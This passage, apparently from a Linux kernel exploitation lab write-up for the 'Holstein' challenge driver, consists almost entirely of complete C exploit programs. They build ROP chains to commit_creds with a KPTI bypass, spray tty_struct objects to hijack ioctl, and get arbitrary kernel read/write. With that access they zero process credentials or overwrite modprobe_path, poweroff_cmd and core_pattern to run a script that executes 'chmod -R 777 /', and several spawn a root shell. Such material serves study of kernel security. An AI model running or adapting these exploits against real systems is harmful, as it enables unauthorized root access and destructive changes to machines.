0xffffffff810202af uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if USER_LOG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } int main() { char buf[2 * VULN_BUFFER_SIZE] = {0}; int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } save_state(); memset(buf, &#39;A&#39;, VULN_BUFFER_SIZE); uint64_t* rop_buf = (uint64_t*)(buf + VULN_BUFFER_SIZE); *rop_buf++ = 0xdeadbeefcafebebe; *rop_buf++ = (uint64_t)(POP_RDI); *rop_buf++ = 0; *rop_buf++ = (uint64_t)(PREPARE_KERNEL_CRED); *rop_buf++ = (uint64_t)(XOR_RCX_RCX); *rop_buf++ = (uint64_t)(MOV_RDI_RAX_REP); *rop_buf++ = (uint64_t)(COMMIT_CREDS); *rop_buf++ = (uint64_t)(SWAPGS); *rop_buf++ = (uint64_t)(IRETQ); *rop_buf++ = (uint64_t)(get_shell); *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); write(fd, buf, (uint64_t)rop_buf - (uint64_t)buf); return 0; }</code></pre></div> <div class="collapsable-code"> <input id="259486371" type="checkbox" checked /> <label for="259486371"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_with_smep_smap_kpti_kaslr.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #define USER_LOG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define POP_RDI_OFFSET (0xffffffff8127bbdc - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff8106e240 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define XOR_RCX_RCX_OFFSET (0xffffffff810abef0 - KERNEL_BASE) #define XOR_RCX_RCX (kernel_base + XOR_RCX_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff8160c96b - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff8106e390 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET (0xffffffff81800e26 - KERNEL_BASE) #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) uint64_t kernel_base; uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if USER_LOG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } int main() { char buf[2 * VULN_BUFFER_SIZE] = {0}; int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } save_state(); read(fd, buf, sizeof(buf)); kernel_base = ((uint64_t*)buf)[0x408 / 8] - 0x13d33c; #if USER_LOG == 1 printf(&#34;[*] kernel_base: 0x%lx\n&#34;, kernel_base); #endif memset(buf, &#39;A&#39;, VULN_BUFFER_SIZE); uint64_t* rop_buf = (uint64_t*)(buf + VULN_BUFFER_SIZE); *rop_buf++ = 0xdeadbeefcafebebe; *rop_buf++ = (uint64_t)(POP_RDI); *rop_buf++ = 0; *rop_buf++ = (uint64_t)(PREPARE_KERNEL_CRED); *rop_buf++ = (uint64_t)(XOR_RCX_RCX); *rop_buf++ = (uint64_t)(MOV_RDI_RAX_REP); *rop_buf++ = (uint64_t)(COMMIT_CREDS); *rop_buf++ = (uint64_t)(BYPASS_KPTI); *rop_buf++ = 0xdeadbeefcafebe00; *rop_buf++ = 0xdeadbeefcafebe01; *rop_buf++ = (uint64_t)(get_shell); *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); write(fd, buf, (uint64_t)rop_buf - (uint64_t)buf); return 0; }</code></pre></div> <h2 id="lk01-2-holstein-v2-heap-overflow">LK01-2 (Holstein v2: Heap Overflow)</h2> <div class="collapsable-code"> <input id="821376549" type="checkbox" checked /> <label for="821376549"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_tty_struct.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define PUSH_RDX_POP_RSP_R13_RBP_OFFSET (0xffffffff813a478a - KERNEL_BASE) #define PUSH_RDX_POP_RSP_R13_RBP (kernel_base + PUSH_RDX_POP_RSP_R13_RBP_OFFSET) #define POP_RDI_OFFSET (0xffffffff810d748d - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff81074650 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_OFFSET (0xffffffff8113c1c4 - KERNEL_BASE) #define POP_RCX (kernel_base + POP_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff8162707b - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff810744b0 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) uint64_t kernel_base, g_buf_addr; uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if PRINT_DEBUG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char *argv[] = {&#34;/bin/sh&#34;, NULL}; char *envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } int main() { char buf[VULN_BUFFER_SIZE * 2]; save_state(); int tty_spray[100]; for (int i = 0; i &lt; 50; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { return -1; } } int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } for (int i = 50; i &lt; 100; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { return -1; } } read(fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x400 + 0x08 * 3) - 0xc38880; g_buf_addr = *(uint64_t *)(buf + 0x400 + 0x08 * 7) - 0x438; #if PRINT_DEBUG == 1 if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = PUSH_RDX_POP_RSP_R13_RBP; // overwrite ioctl *rop_buf++ = POP_RDI; *rop_buf++ = 0; *rop_buf++ = PREPARE_KERNEL_CRED; *rop_buf++ = POP_RCX; *rop_buf++ = 0; *rop_buf++ = MOV_RDI_RAX_REP; *rop_buf++ = COMMIT_CREDS; *rop_buf++ = BYPASS_KPTI; *rop_buf++ = 0xdeadbeefcafebe00; *rop_buf++ = 0xdeadbeefcafebe01; *rop_buf++ = (uint64_t)(get_shell); *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); *(uint64_t *)(buf + 0x400 + 0x08 * 3) = g_buf_addr - 0x0c * 8; write(fd, buf, sizeof(buf)); for (int i = 0; i &lt; 100; ++i) { ioctl(tty_spray[i], 0x00, g_buf_addr - 0x08 * 2 + 0x08); } close(fd); for (int i = 0; i &lt; 100; ++i) { close(tty_spray[i]); } return 0; }</code></pre></div> <div class="collapsable-code"> <input id="386257194" type="checkbox" checked /> <label for="386257194"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_cred.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/prctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define MOV_DWORD_PTR_RDX_ECX_OFFSET (0xffffffff8101083d - KERNEL_BASE) #define MOV_DWORD_PTR_RDX_ECX (kernel_base + MOV_DWORD_PTR_RDX_ECX_OFFSET) #define MOV_EAX_DWORD_PTR_RDX_OFFSET (0xffffffff8118a285 - KERNEL_BASE) #define MOV_EAX_DWORD_PTR_RDX (kernel_base + MOV_EAX_DWORD_PTR_RDX_OFFSET) uint64_t kernel_base, g_buf_addr; int main() { char buf[VULN_BUFFER_SIZE * 2]; int tty_spray[100]; for (int i = 0; i &lt; 50; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { printf(&#34;[-] Failed to open &#34; VULN_DEVICE_NAME &#34;\n&#34;); return -1; } for (int i = 50; i &lt; 100; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } read(fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x400 + 0x08 * 3) - 0xc38880; g_buf_addr = *(uint64_t *)(buf + 0x400 + 0x08 * 7) - 0x438; if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } #if PRINT_DEBUG == 1 printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = 0xdeadbeefcafebebe; // overwrite ioctl *(uint64_t *)(buf + 0x400 + 0x08 * 3) = g_buf_addr - 0x0c * 8; write(fd, buf, sizeof(buf)); #define AAW_INST_ADDR MOV_DWORD_PTR_RDX_ECX #define AAR_INST_ADDR MOV_EAX_DWORD_PTR_RDX #define SET_IOCTL_INST_ADDR(ADDR) \ ({ \ *(uint64_t *)(buf) = (uint64_t)(ADDR); \ write(fd, buf, sizeof(buf)); \ }) SET_IOCTL_INST_ADDR(AAR_INST_ADDR); uint64_t modified_tty_fd = 0; for (int i = 0; i &lt; 100; ++i) { if (ioctl(tty_spray[i], 0x00, g_buf_addr) == *(uint32_t *)buf) { modified_tty_fd = tty_spray[i]; break; } } #define AAW32(ADDR, VAL) \ ({ \ ioctl(modified_tty_fd, (uint32_t)(VAL), \ (uint64_t)(ADDR)); /*RCX &lt;- ARG1, RDX &lt;- ARG2*/ \ }) #define AAR32(ADDR) \ ({ \ uint32_t ret = ioctl(modified_tty_fd, 0x00, (uint64_t)(ADDR)); \ ret; \ }) const char kEvilProcessName[] = &#34;uniguri&#34;; if (prctl(PR_SET_NAME, kEvilProcessName) == -1) { printf(&#34;[-] Failed to set process name\n&#34;); return -1; } SET_IOCTL_INST_ADDR(AAR_INST_ADDR); uint64_t cur_task_addr = 0; for (uint64_t cur_addr = g_buf_addr - 0x1000000;; cur_addr += 8) { uint32_t val = AAR32(cur_addr); #if PRINT_DEBUG == 1 if ((cur_addr &amp; 0xfffff) == 0) { printf(&#34;[*] Searching 0x%016lx...\n&#34;, cur_addr); } #endif if (val == *(uint32_t *)(kEvilProcessName)) { val = AAR32(cur_addr + 0x04); if (val == *(uint32_t *)(kEvilProcessName + 4)) { cur_task_addr = cur_addr; #if PRINT_DEBUG == 1 printf(&#34;[+] Found current task name(%s): 0x%016lx\n&#34;, kEvilProcessName, cur_task_addr); #endif break; } } } if (cur_task_addr == 0) { printf(&#34;[-] Failed to find current task\n&#34;); return -1; } uint64_t cur_task_cred = AAR32(cur_task_addr - 8) | ((uint64_t)AAR32(cur_task_addr - 4) &lt;&lt; 32); #if PRINT_DEBUG == 1 printf(&#34;[*] current_task_cred: 0x%016lx\n&#34;, cur_task_cred); #endif SET_IOCTL_INST_ADDR(AAW_INST_ADDR); for (int i = 1; i &lt; 9; ++i) { AAW32(cur_task_cred + 0x4 * i, 0); } puts(&#34;[+] Get shell!&#34;); system(&#34;/bin/sh&#34;); #undef SET_IOCTL_INST_ADDR #undef AAR32 #undef AAW32 close(fd); for (int i = 0; i &lt; 100; ++i) { close(tty_spray[i]); } return 0; }</code></pre></div> <div class="collapsable-code"> <input id="569318274" type="checkbox" checked /> <label for="569318274"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_modprobe_path.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define MOV_DWORD_PTR_RDX_ECX_OFFSET (0xffffffff8101083d - KERNEL_BASE) #define MOV_DWORD_PTR_RDX_ECX (kernel_base + MOV_DWORD_PTR_RDX_ECX_OFFSET) #define MOV_EAX_DWORD_PTR_RDX_OFFSET (0xffffffff8118a285 - KERNEL_BASE) #define MOV_EAX_DWORD_PTR_RDX (kernel_base + MOV_EAX_DWORD_PTR_RDX_OFFSET) #define MODPROB_PATH_OFFSET (0xffffffff81e38180 - KERNEL_BASE) #define MODPROBE_PATH_ADDR (kernel_base + MODPROB_PATH_OFFSET) uint64_t kernel_base, g_buf_addr; int main() { char buf[VULN_BUFFER_SIZE * 2]; int tty_spray[100]; for (int i = 0; i &lt; 50; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { return -1; } } int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } for (int i = 50; i &lt; 100; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { return -1; } } read(fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x400 + 0x08 * 3) - 0xc38880; g_buf_addr = *(uint64_t *)(buf + 0x400 + 0x08 * 7) - 0x438; #if PRINT_DEBUG == 1 if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = 0xdeadbeefcafebebe; // overwrite ioctl *(uint64_t *)(buf + 0x400 + 0x08 * 3) = g_buf_addr - 0x0c * 8; write(fd, buf, sizeof(buf)); #define AAW_INST_ADDR MOV_DWORD_PTR_RDX_ECX #define AAR_INST_ADDR MOV_EAX_DWORD_PTR_RDX #define SET_IOCTL_INST_ADDR(ADDR) \ ({ \ *(uint64_t *)(buf) = (uint64_t)(ADDR); \ write(fd, buf, sizeof(buf)); \ }) SET_IOCTL_INST_ADDR(AAR_INST_ADDR); uint64_t modified_tty_fd = 0; for (int i = 0; i &lt; 100; ++i) { if (ioctl(tty_spray[i], 0x00, g_buf_addr) == *(uint32_t *)buf) { modified_tty_fd = tty_spray[i]; break; } } #define AAW32(ADDR, VAL) \ ({ \ ioctl(modified_tty_fd, (uint32_t)(VAL), \ (uint64_t)(ADDR)); /*RCX &lt;- ARG1, RDX &lt;- ARG2*/ \ }) #define AAR32(ADDR) \ ({ \ uint32_t ret = ioctl(modified_tty_fd, 0x00, (uint64_t)(ADDR)); \ ret; \ }) const char kRunEvilCmd[] = &#34;/tmp/evil.sh&#34;; SET_IOCTL_INST_ADDR(AAW_INST_ADDR); for (int i = 0; i &lt; sizeof(kRunEvilCmd); i += 4) { AAW32(MODPROBE_PATH_ADDR + i, *(uint32_t *)(kRunEvilCmd + i)); } system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;echo -e &#39;\xde\xad\xbe\xef&#39; &gt; /tmp/pwn&#34;); system(&#34;chmod +x /tmp/pwn&#34;); system(&#34;/tmp/pwn&#34;); #undef SET_IOCTL_INST_ADDR #undef AAR32 #undef AAW32 close(fd); for (int i = 0; i &lt; 100; ++i) { close(tty_spray[i]); } return 0; }</code></pre></div> <div class="collapsable-code"> <input id="452697183" type="checkbox" checked /> <label for="452697183"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_poweroff_cmd.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/prctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define MOV_DWORD_PTR_RDX_ECX_OFFSET (0xffffffff8101083d - KERNEL_BASE) #define MOV_DWORD_PTR_RDX_ECX (kernel_base + MOV_DWORD_PTR_RDX_ECX_OFFSET) #define MOV_EAX_DWORD_PTR_RDX_OFFSET (0xffffffff8118a285 - KERNEL_BASE) #define MOV_EAX_DWORD_PTR_RDX (kernel_base + MOV_EAX_DWORD_PTR_RDX_OFFSET) #define POWEROFF_CMD_OFFSET (0xffffffff81e379c0 - KERNEL_BASE) #define POWEROFF_CMD_ADDR (kernel_base + POWEROFF_CMD_OFFSET) #define ORDERLY_POWEROFF_OFFSET (0xffffffff810750e0 - KERNEL_BASE) #define ORDERLY_POWEROFF (kernel_base + ORDERLY_POWEROFF_OFFSET) uint64_t kernel_base, g_buf_addr; int main() { char buf[VULN_BUFFER_SIZE * 2]; int tty_spray[100]; for (int i = 0; i &lt; 50; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { printf(&#34;[-] Failed to open &#34; VULN_DEVICE_NAME &#34;\n&#34;); return -1; } for (int i = 50; i &lt; 100; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } read(fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x400 + 0x08 * 3) - 0xc38880; g_buf_addr = *(uint64_t *)(buf + 0x400 + 0x08 * 7) - 0x438; if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } #if PRINT_DEBUG == 1 printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = 0xdeadbeefcafebebe; // overwrite ioctl *(uint64_t *)(buf + 0x400 + 0x08 * 3) = g_buf_addr - 0x0c * 8; write(fd, buf, sizeof(buf)); #define AAW_INST_ADDR MOV_DWORD_PTR_RDX_ECX #define AAR_INST_ADDR MOV_EAX_DWORD_PTR_RDX #define SET_IOCTL_INST_ADDR(ADDR) \ ({ \ *(uint64_t *)(buf) = (uint64_t)(ADDR); \ write(fd, buf, sizeof(buf)); \ }) SET_IOCTL_INST_ADDR(AAR_INST_ADDR); uint64_t modified_tty_fd = 0; for (int i = 0; i &lt; 100; ++i) { if (ioctl(tty_spray[i], 0x00, g_buf_addr) == *(uint32_t *)buf) { modified_tty_fd = tty_spray[i]; break; } } #define AAW32(ADDR, VAL) \ ({ \ ioctl(modified_tty_fd, (uint32_t)(VAL), \ (uint64_t)(ADDR)); /*RCX &lt;- ARG1, RDX &lt;- ARG2*/ \ }) #define AAR32(ADDR) \ ({ \ uint32_t ret = ioctl(modified_tty_fd, 0x00, (uint64_t)(ADDR)); \ ret; \ }) const char kRunEvilCmd[] = &#34;/tmp/evil.sh&#34;; SET_IOCTL_INST_ADDR(AAW_INST_ADDR); for (int i = 0; i &lt; sizeof(kRunEvilCmd); i += 4) { AAW32(POWEROFF_CMD_ADDR + i, *(uint32_t *)(kRunEvilCmd + i)); } system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); SET_IOCTL_INST_ADDR(ORDERLY_POWEROFF); ioctl(modified_tty_fd, 0, 0); #undef SET_IOCTL_INST_ADDR #undef AAR32 #undef AAW32 close(fd); for (int i = 0; i &lt; 100; ++i) { close(tty_spray[i]); } return 0; }</code></pre></div> <div class="collapsable-code"> <input id="968312457" type="checkbox" checked /> <label for="968312457"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_core_pattern.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/prctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define MOV_DWORD_PTR_RDX_ECX_OFFSET (0xffffffff8101083d - KERNEL_BASE) #define MOV_DWORD_PTR_RDX_ECX (kernel_base + MOV_DWORD_PTR_RDX_ECX_OFFSET) #define MOV_EAX_DWORD_PTR_RDX_OFFSET (0xffffffff8118a285 - KERNEL_BASE) #define MOV_EAX_DWORD_PTR_RDX (kernel_base + MOV_EAX_DWORD_PTR_RDX_OFFSET) #define CORE_PATTERN_OFFSET (0xffffffff81eb0b20 - KERNEL_BASE) #define CORE_PATTERN_ADDR (kernel_base + CORE_PATTERN_OFFSET) uint64_t kernel_base, g_buf_addr; int main() { char buf[VULN_BUFFER_SIZE * 2]; int tty_spray[100]; for (int i = 0; i &lt; 50; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { printf(&#34;[-] Failed to open &#34; VULN_DEVICE_NAME &#34;\n&#34;); return -1; } for (int i = 50; i &lt; 100; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } read(fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x400 + 0x08 * 3) - 0xc38880; g_buf_addr = *(uint64_t *)(buf + 0x400 + 0x08 * 7) - 0x438; if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } #if PRINT_DEBUG == 1 printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = 0xdeadbeefcafebebe; // overwrite ioctl *(uint64_t *)(buf + 0x400 + 0x08 * 3) = g_buf_addr - 0x0c * 8; write(fd, buf, sizeof(buf)); #define AAW_INST_ADDR MOV_DWORD_PTR_RDX_ECX #define AAR_INST_ADDR MOV_EAX_DWORD_PTR_RDX #define SET_IOCTL_INST_ADDR(ADDR) \ ({ \ *(uint64_t *)(buf) = (uint64_t)(ADDR); \ write(fd, buf, sizeof(buf)); \ }) SET_IOCTL_INST_ADDR(AAR_INST_ADDR); uint64_t modified_tty_fd = 0; for (int i = 0; i &lt; 100; ++i) { if (ioctl(tty_spray[i], 0x00, g_buf_addr) == *(uint32_t *)buf) { modified_tty_fd = tty_spray[i]; break; } } #define AAW32(ADDR, VAL) \ ({ \ ioctl(modified_tty_fd, (uint32_t)(VAL), \ (uint64_t)(ADDR)); /*RCX &lt;- ARG1, RDX &lt;- ARG2*/ \ }) #define AAR32(ADDR) \ ({ \ uint32_t ret = ioctl(modified_tty_fd, 0x00, (uint64_t)(ADDR)); \ ret; \ }) const char kRunEvilCmd[] = &#34;|/tmp/evil.sh&#34;; SET_IOCTL_INST_ADDR(AAW_INST_ADDR); for (int i = 0; i &lt; sizeof(kRunEvilCmd); i += 4) { AAW32(CORE_PATTERN_ADDR + i, *(uint32_t *)(kRunEvilCmd + i)); } system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;ulimit -c unlimited&#34;); uint64_t *evil_ptr = (uint64_t *)0xdeadbeefcafebebe; *evil_ptr = 0xdeadbeefcafebebe; #undef SET_IOCTL_INST_ADDR #undef AAR32 #undef AAW32 close(fd); for (int i = 0; i &lt; 100; ++i) { close(tty_spray[i]); } return 0; }</code></pre></div> <h2 